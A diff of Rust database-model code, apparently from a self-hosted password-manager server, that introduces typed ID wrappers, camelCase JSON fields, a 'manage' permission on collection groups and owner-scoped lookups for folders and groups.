#[diesel(primary_key(cipher_uuid, folder_uuid))]
|
||||||
pub struct FolderCipher {
|
pub struct FolderCipher {
|
||||||
pub cipher_uuid: String,
|
pub cipher_uuid: CipherId,
|
||||||
pub folder_uuid: String,
|
pub folder_uuid: FolderId,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
impl Folder {
|
impl Folder {
|
||||||
pub fn new(user_uuid: String, name: String) -> Self {
|
pub fn new(user_uuid: UserId, name: String) -> Self {
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
|
|
||||||
Self {
|
Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: FolderId(crate::util::get_uuid()),
|
||||||
created_at: now,
|
created_at: now,
|
||||||
updated_at: now,
|
updated_at: now,
|
||||||
|
|
||||||
@@ -43,19 +45,19 @@ impl Folder {
|
|||||||
use crate::util::format_date;
|
use crate::util::format_date;
|
||||||
|
|
||||||
json!({
|
json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"RevisionDate": format_date(&self.updated_at),
|
"revisionDate": format_date(&self.updated_at),
|
||||||
"Name": self.name,
|
"name": self.name,
|
||||||
"Object": "folder",
|
"object": "folder",
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
impl FolderCipher {
|
impl FolderCipher {
|
||||||
pub fn new(folder_uuid: &str, cipher_uuid: &str) -> Self {
|
pub fn new(folder_uuid: FolderId, cipher_uuid: CipherId) -> Self {
|
||||||
Self {
|
Self {
|
||||||
folder_uuid: folder_uuid.to_string(),
|
folder_uuid,
|
||||||
cipher_uuid: cipher_uuid.to_string(),
|
cipher_uuid,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -113,24 +115,25 @@ impl Folder {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_user(user_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_user(user_uuid: &UserId, conn: &mut DbConn) -> EmptyResult {
|
||||||
for folder in Self::find_by_user(user_uuid, conn).await {
|
for folder in Self::find_by_user(user_uuid, conn).await {
|
||||||
folder.delete(conn).await?;
|
folder.delete(conn).await?;
|
||||||
}
|
}
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid_and_user(uuid: &FolderId, user_uuid: &UserId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
folders::table
|
folders::table
|
||||||
.filter(folders::uuid.eq(uuid))
|
.filter(folders::uuid.eq(uuid))
|
||||||
|
.filter(folders::user_uuid.eq(user_uuid))
|
||||||
.first::<FolderDb>(conn)
|
.first::<FolderDb>(conn)
|
||||||
.ok()
|
.ok()
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
folders::table
|
folders::table
|
||||||
.filter(folders::user_uuid.eq(user_uuid))
|
.filter(folders::user_uuid.eq(user_uuid))
|
||||||
@@ -176,7 +179,7 @@ impl FolderCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_cipher(cipher_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_cipher(cipher_uuid: &CipherId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(folders_ciphers::table.filter(folders_ciphers::cipher_uuid.eq(cipher_uuid)))
|
diesel::delete(folders_ciphers::table.filter(folders_ciphers::cipher_uuid.eq(cipher_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -184,7 +187,7 @@ impl FolderCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_folder(folder_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_folder(folder_uuid: &FolderId, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
diesel::delete(folders_ciphers::table.filter(folders_ciphers::folder_uuid.eq(folder_uuid)))
|
diesel::delete(folders_ciphers::table.filter(folders_ciphers::folder_uuid.eq(folder_uuid)))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
@@ -192,7 +195,11 @@ impl FolderCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_folder_and_cipher(folder_uuid: &str, cipher_uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_folder_and_cipher(
|
||||||
|
folder_uuid: &FolderId,
|
||||||
|
cipher_uuid: &CipherId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
folders_ciphers::table
|
folders_ciphers::table
|
||||||
.filter(folders_ciphers::folder_uuid.eq(folder_uuid))
|
.filter(folders_ciphers::folder_uuid.eq(folder_uuid))
|
||||||
@@ -203,7 +210,7 @@ impl FolderCipher {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_folder(folder_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_folder(folder_uuid: &FolderId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
folders_ciphers::table
|
folders_ciphers::table
|
||||||
.filter(folders_ciphers::folder_uuid.eq(folder_uuid))
|
.filter(folders_ciphers::folder_uuid.eq(folder_uuid))
|
||||||
@@ -215,14 +222,32 @@ impl FolderCipher {
|
|||||||
|
|
||||||
/// Return a vec with (cipher_uuid, folder_uuid)
|
/// Return a vec with (cipher_uuid, folder_uuid)
|
||||||
/// This is used during a full sync so we only need one query for all folder matches.
|
/// This is used during a full sync so we only need one query for all folder matches.
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<(String, String)> {
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<(CipherId, FolderId)> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
folders_ciphers::table
|
folders_ciphers::table
|
||||||
.inner_join(folders::table)
|
.inner_join(folders::table)
|
||||||
.filter(folders::user_uuid.eq(user_uuid))
|
.filter(folders::user_uuid.eq(user_uuid))
|
||||||
.select(folders_ciphers::all_columns)
|
.select(folders_ciphers::all_columns)
|
||||||
.load::<(String, String)>(conn)
|
.load::<(CipherId, FolderId)>(conn)
|
||||||
.unwrap_or_default()
|
.unwrap_or_default()
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
#[derive(
|
||||||
|
Clone,
|
||||||
|
Debug,
|
||||||
|
AsRef,
|
||||||
|
Deref,
|
||||||
|
DieselNewType,
|
||||||
|
Display,
|
||||||
|
From,
|
||||||
|
FromForm,
|
||||||
|
Hash,
|
||||||
|
PartialEq,
|
||||||
|
Eq,
|
||||||
|
Serialize,
|
||||||
|
Deserialize,
|
||||||
|
UuidFromParam,
|
||||||
|
)]
|
||||||
|
pub struct FolderId(String);
|
||||||
|
|||||||
@@ -1,13 +1,20 @@
|
|||||||
|
use super::{CollectionId, Membership, MembershipId, OrganizationId, User, UserId};
|
||||||
|
use crate::api::EmptyResult;
|
||||||
|
use crate::db::DbConn;
|
||||||
|
use crate::error::MapResult;
|
||||||
use chrono::{NaiveDateTime, Utc};
|
use chrono::{NaiveDateTime, Utc};
|
||||||
|
use derive_more::{AsRef, Deref, Display, From};
|
||||||
|
use macros::UuidFromParam;
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
|
|
||||||
db_object! {
|
db_object! {
|
||||||
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
#[derive(Identifiable, Queryable, Insertable, AsChangeset)]
|
||||||
#[diesel(table_name = groups)]
|
#[diesel(table_name = groups)]
|
||||||
|
#[diesel(treat_none_as_null = true)]
|
||||||
#[diesel(primary_key(uuid))]
|
#[diesel(primary_key(uuid))]
|
||||||
pub struct Group {
|
pub struct Group {
|
||||||
pub uuid: String,
|
pub uuid: GroupId,
|
||||||
pub organizations_uuid: String,
|
pub organizations_uuid: OrganizationId,
|
||||||
pub name: String,
|
pub name: String,
|
||||||
pub access_all: bool,
|
pub access_all: bool,
|
||||||
pub external_id: Option<String>,
|
pub external_id: Option<String>,
|
||||||
@@ -19,28 +26,34 @@ db_object! {
|
|||||||
#[diesel(table_name = collections_groups)]
|
#[diesel(table_name = collections_groups)]
|
||||||
#[diesel(primary_key(collections_uuid, groups_uuid))]
|
#[diesel(primary_key(collections_uuid, groups_uuid))]
|
||||||
pub struct CollectionGroup {
|
pub struct CollectionGroup {
|
||||||
pub collections_uuid: String,
|
pub collections_uuid: CollectionId,
|
||||||
pub groups_uuid: String,
|
pub groups_uuid: GroupId,
|
||||||
pub read_only: bool,
|
pub read_only: bool,
|
||||||
pub hide_passwords: bool,
|
pub hide_passwords: bool,
|
||||||
|
pub manage: bool,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Identifiable, Queryable, Insertable)]
|
#[derive(Identifiable, Queryable, Insertable)]
|
||||||
#[diesel(table_name = groups_users)]
|
#[diesel(table_name = groups_users)]
|
||||||
#[diesel(primary_key(groups_uuid, users_organizations_uuid))]
|
#[diesel(primary_key(groups_uuid, users_organizations_uuid))]
|
||||||
pub struct GroupUser {
|
pub struct GroupUser {
|
||||||
pub groups_uuid: String,
|
pub groups_uuid: GroupId,
|
||||||
pub users_organizations_uuid: String
|
pub users_organizations_uuid: MembershipId
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Local methods
|
/// Local methods
|
||||||
impl Group {
|
impl Group {
|
||||||
pub fn new(organizations_uuid: String, name: String, access_all: bool, external_id: Option<String>) -> Self {
|
pub fn new(
|
||||||
|
organizations_uuid: OrganizationId,
|
||||||
|
name: String,
|
||||||
|
access_all: bool,
|
||||||
|
external_id: Option<String>,
|
||||||
|
) -> Self {
|
||||||
let now = Utc::now().naive_utc();
|
let now = Utc::now().naive_utc();
|
||||||
|
|
||||||
let mut new_model = Self {
|
let mut new_model = Self {
|
||||||
uuid: crate::util::get_uuid(),
|
uuid: GroupId(crate::util::get_uuid()),
|
||||||
organizations_uuid,
|
organizations_uuid,
|
||||||
name,
|
name,
|
||||||
access_all,
|
access_all,
|
||||||
@@ -55,41 +68,40 @@ impl Group {
|
|||||||
}
|
}
|
||||||
|
|
||||||
pub fn to_json(&self) -> Value {
|
pub fn to_json(&self) -> Value {
|
||||||
use crate::util::format_date;
|
|
||||||
|
|
||||||
json!({
|
json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"OrganizationId": self.organizations_uuid,
|
"organizationId": self.organizations_uuid,
|
||||||
"Name": self.name,
|
"name": self.name,
|
||||||
"AccessAll": self.access_all,
|
"externalId": self.external_id,
|
||||||
"ExternalId": self.external_id,
|
"object": "group"
|
||||||
"CreationDate": format_date(&self.creation_date),
|
|
||||||
"RevisionDate": format_date(&self.revision_date),
|
|
||||||
"Object": "group"
|
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn to_json_details(&self, conn: &mut DbConn) -> Value {
|
pub async fn to_json_details(&self, conn: &mut DbConn) -> Value {
|
||||||
|
// If both read_only and hide_passwords are false, then manage should be true
|
||||||
|
// You can't have an entry with read_only and manage, or hide_passwords and manage
|
||||||
|
// Or an entry with everything to false
|
||||||
let collections_groups: Vec<Value> = CollectionGroup::find_by_group(&self.uuid, conn)
|
let collections_groups: Vec<Value> = CollectionGroup::find_by_group(&self.uuid, conn)
|
||||||
.await
|
.await
|
||||||
.iter()
|
.iter()
|
||||||
.map(|entry| {
|
.map(|entry| {
|
||||||
json!({
|
json!({
|
||||||
"Id": entry.collections_uuid,
|
"id": entry.collections_uuid,
|
||||||
"ReadOnly": entry.read_only,
|
"readOnly": entry.read_only,
|
||||||
"HidePasswords": entry.hide_passwords
|
"hidePasswords": entry.hide_passwords,
|
||||||
|
"manage": entry.manage,
|
||||||
})
|
})
|
||||||
})
|
})
|
||||||
.collect();
|
.collect();
|
||||||
|
|
||||||
json!({
|
json!({
|
||||||
"Id": self.uuid,
|
"id": self.uuid,
|
||||||
"OrganizationId": self.organizations_uuid,
|
"organizationId": self.organizations_uuid,
|
||||||
"Name": self.name,
|
"name": self.name,
|
||||||
"AccessAll": self.access_all,
|
"accessAll": self.access_all,
|
||||||
"ExternalId": self.external_id,
|
"externalId": self.external_id,
|
||||||
"Collections": collections_groups,
|
"collections": collections_groups,
|
||||||
"Object": "groupDetails"
|
"object": "groupDetails"
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -103,18 +115,38 @@ impl Group {
|
|||||||
}
|
}
|
||||||
|
|
||||||
impl CollectionGroup {
|
impl CollectionGroup {
|
||||||
pub fn new(collections_uuid: String, groups_uuid: String, read_only: bool, hide_passwords: bool) -> Self {
|
pub fn new(
|
||||||
|
collections_uuid: CollectionId,
|
||||||
|
groups_uuid: GroupId,
|
||||||
|
read_only: bool,
|
||||||
|
hide_passwords: bool,
|
||||||
|
manage: bool,
|
||||||
|
) -> Self {
|
||||||
Self {
|
Self {
|
||||||
collections_uuid,
|
collections_uuid,
|
||||||
groups_uuid,
|
groups_uuid,
|
||||||
read_only,
|
read_only,
|
||||||
hide_passwords,
|
hide_passwords,
|
||||||
|
manage,
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub fn to_json_details_for_group(&self) -> Value {
|
||||||
|
// If both read_only and hide_passwords are false, then manage should be true
|
||||||
|
// You can't have an entry with read_only and manage, or hide_passwords and manage
|
||||||
|
// Or an entry with everything to false
|
||||||
|
// For backwards compaibility and migration proposes we keep checking read_only and hide_password
|
||||||
|
json!({
|
||||||
|
"id": self.groups_uuid,
|
||||||
|
"readOnly": self.read_only,
|
||||||
|
"hidePasswords": self.hide_passwords,
|
||||||
|
"manage": self.manage || (!self.read_only && !self.hide_passwords),
|
||||||
|
})
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
impl GroupUser {
|
impl GroupUser {
|
||||||
pub fn new(groups_uuid: String, users_organizations_uuid: String) -> Self {
|
pub fn new(groups_uuid: GroupId, users_organizations_uuid: MembershipId) -> Self {
|
||||||
Self {
|
Self {
|
||||||
groups_uuid,
|
groups_uuid,
|
||||||
users_organizations_uuid,
|
users_organizations_uuid,
|
||||||
@@ -122,13 +154,6 @@ impl GroupUser {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
use crate::db::DbConn;
|
|
||||||
|
|
||||||
use crate::api::EmptyResult;
|
|
||||||
use crate::error::MapResult;
|
|
||||||
|
|
||||||
use super::{User, UserOrganization};
|
|
||||||
|
|
||||||
/// Database methods
|
/// Database methods
|
||||||
impl Group {
|
impl Group {
|
||||||
pub async fn save(&mut self, conn: &mut DbConn) -> EmptyResult {
|
pub async fn save(&mut self, conn: &mut DbConn) -> EmptyResult {
|
||||||
@@ -165,27 +190,27 @@ impl Group {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_organization(org_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> EmptyResult {
|
||||||
for group in Self::find_by_organization(org_uuid, conn).await {
|
for group in Self::find_by_organization(org_uuid, conn).await {
|
||||||
group.delete(conn).await?;
|
group.delete(conn).await?;
|
||||||
}
|
}
|
||||||
Ok(())
|
Ok(())
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_organization(organizations_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_organization(org_uuid: &OrganizationId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
groups::table
|
groups::table
|
||||||
.filter(groups::organizations_uuid.eq(organizations_uuid))
|
.filter(groups::organizations_uuid.eq(org_uuid))
|
||||||
.load::<GroupDb>(conn)
|
.load::<GroupDb>(conn)
|
||||||
.expect("Error loading groups")
|
.expect("Error loading groups")
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn count_by_org(organizations_uuid: &str, conn: &mut DbConn) -> i64 {
|
pub async fn count_by_org(org_uuid: &OrganizationId, conn: &mut DbConn) -> i64 {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
groups::table
|
groups::table
|
||||||
.filter(groups::organizations_uuid.eq(organizations_uuid))
|
.filter(groups::organizations_uuid.eq(org_uuid))
|
||||||
.count()
|
.count()
|
||||||
.first::<i64>(conn)
|
.first::<i64>(conn)
|
||||||
.ok()
|
.ok()
|
||||||
@@ -193,27 +218,33 @@ impl Group {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_uuid(uuid: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_uuid_and_org(uuid: &GroupId, org_uuid: &OrganizationId, conn: &mut DbConn) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
groups::table
|
groups::table
|
||||||
.filter(groups::uuid.eq(uuid))
|
.filter(groups::uuid.eq(uuid))
|
||||||
|
.filter(groups::organizations_uuid.eq(org_uuid))
|
||||||
.first::<GroupDb>(conn)
|
.first::<GroupDb>(conn)
|
||||||
.ok()
|
.ok()
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_external_id(id: &str, conn: &mut DbConn) -> Option<Self> {
|
pub async fn find_by_external_id_and_org(
|
||||||
|
external_id: &str,
|
||||||
|
org_uuid: &OrganizationId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> Option<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
groups::table
|
groups::table
|
||||||
.filter(groups::external_id.eq(id))
|
.filter(groups::external_id.eq(external_id))
|
||||||
|
.filter(groups::organizations_uuid.eq(org_uuid))
|
||||||
.first::<GroupDb>(conn)
|
.first::<GroupDb>(conn)
|
||||||
.ok()
|
.ok()
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
//Returns all organizations the user has full access to
|
//Returns all organizations the user has full access to
|
||||||
pub async fn gather_user_organizations_full_access(user_uuid: &str, conn: &mut DbConn) -> Vec<String> {
|
pub async fn get_orgs_by_user_with_full_access(user_uuid: &UserId, conn: &mut DbConn) -> Vec<OrganizationId> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
groups_users::table
|
groups_users::table
|
||||||
.inner_join(users_organizations::table.on(
|
.inner_join(users_organizations::table.on(
|
||||||
@@ -226,12 +257,12 @@ impl Group {
|
|||||||
.filter(groups::access_all.eq(true))
|
.filter(groups::access_all.eq(true))
|
||||||
.select(groups::organizations_uuid)
|
.select(groups::organizations_uuid)
|
||||||
.distinct()
|
.distinct()
|
||||||
.load::<String>(conn)
|
.load::<OrganizationId>(conn)
|
||||||
.expect("Error loading organization group full access information for user")
|
.expect("Error loading organization group full access information for user")
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn is_in_full_access_group(user_uuid: &str, org_uuid: &str, conn: &mut DbConn) -> bool {
|
pub async fn is_in_full_access_group(user_uuid: &UserId, org_uuid: &OrganizationId, conn: &mut DbConn) -> bool {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
groups::table
|
groups::table
|
||||||
.inner_join(groups_users::table.on(
|
.inner_join(groups_users::table.on(
|
||||||
@@ -260,13 +291,13 @@ impl Group {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn update_revision(uuid: &str, conn: &mut DbConn) {
|
pub async fn update_revision(uuid: &GroupId, conn: &mut DbConn) {
|
||||||
if let Err(e) = Self::_update_revision(uuid, &Utc::now().naive_utc(), conn).await {
|
if let Err(e) = Self::_update_revision(uuid, &Utc::now().naive_utc(), conn).await {
|
||||||
warn!("Failed to update revision for {}: {:#?}", uuid, e);
|
warn!("Failed to update revision for {uuid}: {e:#?}");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn _update_revision(uuid: &str, date: &NaiveDateTime, conn: &mut DbConn) -> EmptyResult {
|
async fn _update_revision(uuid: &GroupId, date: &NaiveDateTime, conn: &mut DbConn) -> EmptyResult {
|
||||||
db_run! {conn: {
|
db_run! {conn: {
|
||||||
crate::util::retry(|| {
|
crate::util::retry(|| {
|
||||||
diesel::update(groups::table.filter(groups::uuid.eq(uuid)))
|
diesel::update(groups::table.filter(groups::uuid.eq(uuid)))
|
||||||
@@ -293,6 +324,7 @@ impl CollectionGroup {
|
|||||||
collections_groups::groups_uuid.eq(&self.groups_uuid),
|
collections_groups::groups_uuid.eq(&self.groups_uuid),
|
||||||
collections_groups::read_only.eq(&self.read_only),
|
collections_groups::read_only.eq(&self.read_only),
|
||||||
collections_groups::hide_passwords.eq(&self.hide_passwords),
|
collections_groups::hide_passwords.eq(&self.hide_passwords),
|
||||||
|
collections_groups::manage.eq(&self.manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
{
|
{
|
||||||
@@ -307,6 +339,7 @@ impl CollectionGroup {
|
|||||||
collections_groups::groups_uuid.eq(&self.groups_uuid),
|
collections_groups::groups_uuid.eq(&self.groups_uuid),
|
||||||
collections_groups::read_only.eq(&self.read_only),
|
collections_groups::read_only.eq(&self.read_only),
|
||||||
collections_groups::hide_passwords.eq(&self.hide_passwords),
|
collections_groups::hide_passwords.eq(&self.hide_passwords),
|
||||||
|
collections_groups::manage.eq(&self.manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error adding group to collection")
|
.map_res("Error adding group to collection")
|
||||||
@@ -321,12 +354,14 @@ impl CollectionGroup {
|
|||||||
collections_groups::groups_uuid.eq(&self.groups_uuid),
|
collections_groups::groups_uuid.eq(&self.groups_uuid),
|
||||||
collections_groups::read_only.eq(self.read_only),
|
collections_groups::read_only.eq(self.read_only),
|
||||||
collections_groups::hide_passwords.eq(self.hide_passwords),
|
collections_groups::hide_passwords.eq(self.hide_passwords),
|
||||||
|
collections_groups::manage.eq(self.manage),
|
||||||
))
|
))
|
||||||
.on_conflict((collections_groups::collections_uuid, collections_groups::groups_uuid))
|
.on_conflict((collections_groups::collections_uuid, collections_groups::groups_uuid))
|
||||||
.do_update()
|
.do_update()
|
||||||
.set((
|
.set((
|
||||||
collections_groups::read_only.eq(self.read_only),
|
collections_groups::read_only.eq(self.read_only),
|
||||||
collections_groups::hide_passwords.eq(self.hide_passwords),
|
collections_groups::hide_passwords.eq(self.hide_passwords),
|
||||||
|
collections_groups::manage.eq(self.manage),
|
||||||
))
|
))
|
||||||
.execute(conn)
|
.execute(conn)
|
||||||
.map_res("Error adding group to collection")
|
.map_res("Error adding group to collection")
|
||||||
@@ -334,7 +369,7 @@ impl CollectionGroup {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_group(group_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_group(group_uuid: &GroupId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections_groups::table
|
collections_groups::table
|
||||||
.filter(collections_groups::groups_uuid.eq(group_uuid))
|
.filter(collections_groups::groups_uuid.eq(group_uuid))
|
||||||
@@ -344,7 +379,7 @@ impl CollectionGroup {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(user_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_user(user_uuid: &UserId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections_groups::table
|
collections_groups::table
|
||||||
.inner_join(groups_users::table.on(
|
.inner_join(groups_users::table.on(
|
||||||
@@ -361,7 +396,7 @@ impl CollectionGroup {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_collection(collection_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
collections_groups::table
|
collections_groups::table
|
||||||
.filter(collections_groups::collections_uuid.eq(collection_uuid))
|
.filter(collections_groups::collections_uuid.eq(collection_uuid))
|
||||||
@@ -387,7 +422,7 @@ impl CollectionGroup {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_group(group_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_group(group_uuid: &GroupId, conn: &mut DbConn) -> EmptyResult {
|
||||||
let group_users = GroupUser::find_by_group(group_uuid, conn).await;
|
let group_users = GroupUser::find_by_group(group_uuid, conn).await;
|
||||||
for group_user in group_users {
|
for group_user in group_users {
|
||||||
group_user.update_user_revision(conn).await;
|
group_user.update_user_revision(conn).await;
|
||||||
@@ -401,7 +436,7 @@ impl CollectionGroup {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn delete_all_by_collection(collection_uuid: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn delete_all_by_collection(collection_uuid: &CollectionId, conn: &mut DbConn) -> EmptyResult {
|
||||||
let collection_assigned_to_groups = CollectionGroup::find_by_collection(collection_uuid, conn).await;
|
let collection_assigned_to_groups = CollectionGroup::find_by_collection(collection_uuid, conn).await;
|
||||||
for collection_assigned_to_group in collection_assigned_to_groups {
|
for collection_assigned_to_group in collection_assigned_to_groups {
|
||||||
let group_users = GroupUser::find_by_group(&collection_assigned_to_group.groups_uuid, conn).await;
|
let group_users = GroupUser::find_by_group(&collection_assigned_to_group.groups_uuid, conn).await;
|
||||||
@@ -466,7 +501,7 @@ impl GroupUser {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_group(group_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_group(group_uuid: &GroupId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
groups_users::table
|
groups_users::table
|
||||||
.filter(groups_users::groups_uuid.eq(group_uuid))
|
.filter(groups_users::groups_uuid.eq(group_uuid))
|
||||||
@@ -476,43 +511,80 @@ impl GroupUser {
|
|||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn find_by_user(users_organizations_uuid: &str, conn: &mut DbConn) -> Vec<Self> {
|
pub async fn find_by_member(member_uuid: &MembershipId, conn: &mut DbConn) -> Vec<Self> {
|
||||||
db_run! { conn: {
|
db_run! { conn: {
|
||||||
groups_users::table
|
groups_users::table
|
||||||
.filter(groups_users::users_organizations_uuid.eq(users_organizations_uuid))
|
.filter(groups_users::users_organizations_uuid.eq(member_uuid))
|
||||||
.load::<GroupUserDb>(conn)
|
.load::<GroupUserDb>(conn)
|
||||||
.expect("Error loading groups for user")
|
.expect("Error loading groups for user")
|
||||||
.from_db()
|
.from_db()
|
||||||
}}
|
}}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
pub async fn has_access_to_collection_by_member(
|
||||||
|
collection_uuid: &CollectionId,
|
||||||
|
member_uuid: &MembershipId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> bool {
|
||||||
|
db_run! { conn: {
|
||||||
|
groups_users::table
|
||||||
|
.inner_join(collections_groups::table.on(
|
||||||
|
collections_groups::groups_uuid.eq(groups_users::groups_uuid)
|
||||||
|
))
|
||||||
|
.filter(collections_groups::collections_uuid.eq(collection_uuid))
|
||||||
|
.filter(groups_users::users_organizations_uuid.eq(member_uuid))
|
||||||
|
.count()
|
||||||
|
.first::<i64>(conn)
|
||||||
|
.unwrap_or(0) != 0
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
|
pub async fn has_full_access_by_member(
|
||||||
|
org_uuid: &OrganizationId,
|
||||||
|
member_uuid: &MembershipId,
|
||||||
|
conn: &mut DbConn,
|
||||||
|
) -> bool {
|
||||||
|
db_run! { conn: {
|
||||||
|
groups_users::table
|
||||||
|
.inner_join(groups::table.on(
|
||||||
|
groups::uuid.eq(groups_users::groups_uuid)
|
||||||
|
))
|
||||||
|
.filter(groups::organizations_uuid.eq(org_uuid))
|
||||||
|
.filter(groups::access_all.eq(true))
|
||||||
|
.filter(groups_users::users_organizations_uuid.eq(member_uuid))
|
||||||
|
.count()
|
||||||
|
.first::<i64>(conn)
|
||||||
|
.unwrap_or(0) != 0
|
||||||
|
}}
|
||||||
|
}
|
||||||
|
|
||||||
pub async fn update_user_revision(&self, conn: &mut DbConn) {
|
pub async fn update_user_revision(&self, conn: &mut DbConn) {
|
||||||
